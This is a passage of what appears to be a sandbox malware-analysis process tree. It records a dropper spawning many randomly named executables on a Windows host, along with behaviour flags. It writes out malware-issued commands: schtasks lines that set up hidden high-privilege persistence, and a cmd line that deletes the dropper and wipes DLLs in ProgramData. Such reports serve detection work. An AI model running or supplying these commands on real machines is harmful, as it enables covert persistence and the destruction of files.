- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:10448
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:11064
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:10932
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:10420
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:11200
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:7064
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:4740
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:10832
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:6984
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:1424
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:7636
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:7848
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:9780
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 9780 -s 28
      4⤵
      Program crash
      PID:7652
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:4564
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:8028
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:7644
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:1008
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:6024
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:10460
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:8512
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:9440
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:8536
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4676
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:9064
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:2872
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:9156
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:3848
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:7956
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:6048
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:4352
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:4000
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:10980
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:1532
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:7232
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:4356
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:8736
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:8720
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:4512
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:10188
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:484
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:3060
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:4720
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:8360
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:4204
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:10156
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:6640
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:9880
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:9612
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:7256
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:8448
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:8140
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:5588
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:10400
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:8264
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:10980
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:6724
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:3116
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:3916
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:5788
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:10876
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:6340
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:6520
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:2668
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:8408
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:10780
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:10216
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:2540
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:8488
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:9072
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:11688
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:12544
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:13076
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:12792
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:13208
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:12684
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:13052
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:8840
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:2236
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:12880
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:12836
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:9016
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:13292
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:11868
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:9624
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:10960
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:13508
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:14068
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:13664
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:14264
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:13324
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:13664
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:12740
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:13928
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:14092
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:13756
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:9492
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:13416
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID:6020
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:2864
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:2948
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:12400
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:11532
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:13476
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:12040
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:11256
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:12076
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:1912
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:6256
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:2648
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:12920
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:7480
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:5496
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:13060
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:9808
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:12284
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:14340
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:14980
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:14400
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:15160
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:14832
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:12592
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:14688
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:14104
- C:\Users\Admin\Documents\Tz4kBSsK8ii3PudsbF84i4VD.exe
  "C:\Users\Admin\Documents\Tz4kBSsK8ii3PudsbF84i4VD.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:1888
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:4520
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:3376
- - C:\Users\Admin\Documents\J77cmUgJX0OQi4nZtiqUPG2L.exe
    "C:\Users\Admin\Documents\J77cmUgJX0OQi4nZtiqUPG2L.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:4704
  - - C:\Users\Admin\Documents\hP2qezksGYt7OdztM_PeLkAo.exe
      "C:\Users\Admin\Documents\hP2qezksGYt7OdztM_PeLkAo.exe"
      4⤵
      Executes dropped EXE
      PID:5176
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 296
        5⤵
        Program crash
        
        PID:6260
  - - C:\Users\Admin\Documents\CBqmMk964nU0xwXkbiyzKbM1.exe
      "C:\Users\Admin\Documents\CBqmMk964nU0xwXkbiyzKbM1.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:5988
    - - C:\Users\Admin\AppData\Roaming\3842319.exe
        
        "C:\Users\Admin\AppData\Roaming\3842319.exe"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6184
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 6184 -s 2296
        6⤵
        Program crash
        
        PID:7568
    - - C:\Users\Admin\AppData\Roaming\8676110.exe
        
        "C:\Users\Admin\AppData\Roaming\8676110.exe"
        5⤵
        Suspicious behavior: SetClipboardViewer
        
        PID:6772
    - - C:\Users\Admin\AppData\Roaming\3354566.exe
        
        "C:\Users\Admin\AppData\Roaming\3354566.exe"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6576
    - - C:\Users\Admin\AppData\Roaming\4279560.exe
        
        "C:\Users\Admin\AppData\Roaming\4279560.exe"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6884
    - - C:\Users\Admin\AppData\Roaming\7080958.exe
        
        "C:\Users\Admin\AppData\Roaming\7080958.exe"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7436
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7436 -s 2436
        6⤵
        Program crash
        
        PID:9776
- C:\Users\Admin\Documents\7glI7txA9mjGcEeaSo4MST6J.exe
  "C:\Users\Admin\Documents\7glI7txA9mjGcEeaSo4MST6J.exe"
  2⤵
  - Executes dropped EXE
  PID:1896
- - C:\Users\Admin\Documents\7glI7txA9mjGcEeaSo4MST6J.exe
    "C:\Users\Admin\Documents\7glI7txA9mjGcEeaSo4MST6J.exe"
    3⤵
    - Checks processor information in registry
    PID:7712
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im 7glI7txA9mjGcEeaSo4MST6J.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\7glI7txA9mjGcEeaSo4MST6J.exe" & del C:\ProgramData\*.dll & exit
      4⤵
      PID:6092
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im 7glI7txA9mjGcEeaSo4MST6J.exe /f
        5⤵
        Kills process with taskkill
        
        PID:10624
    - - C:\Windows\SysWOW64\timeout.exe
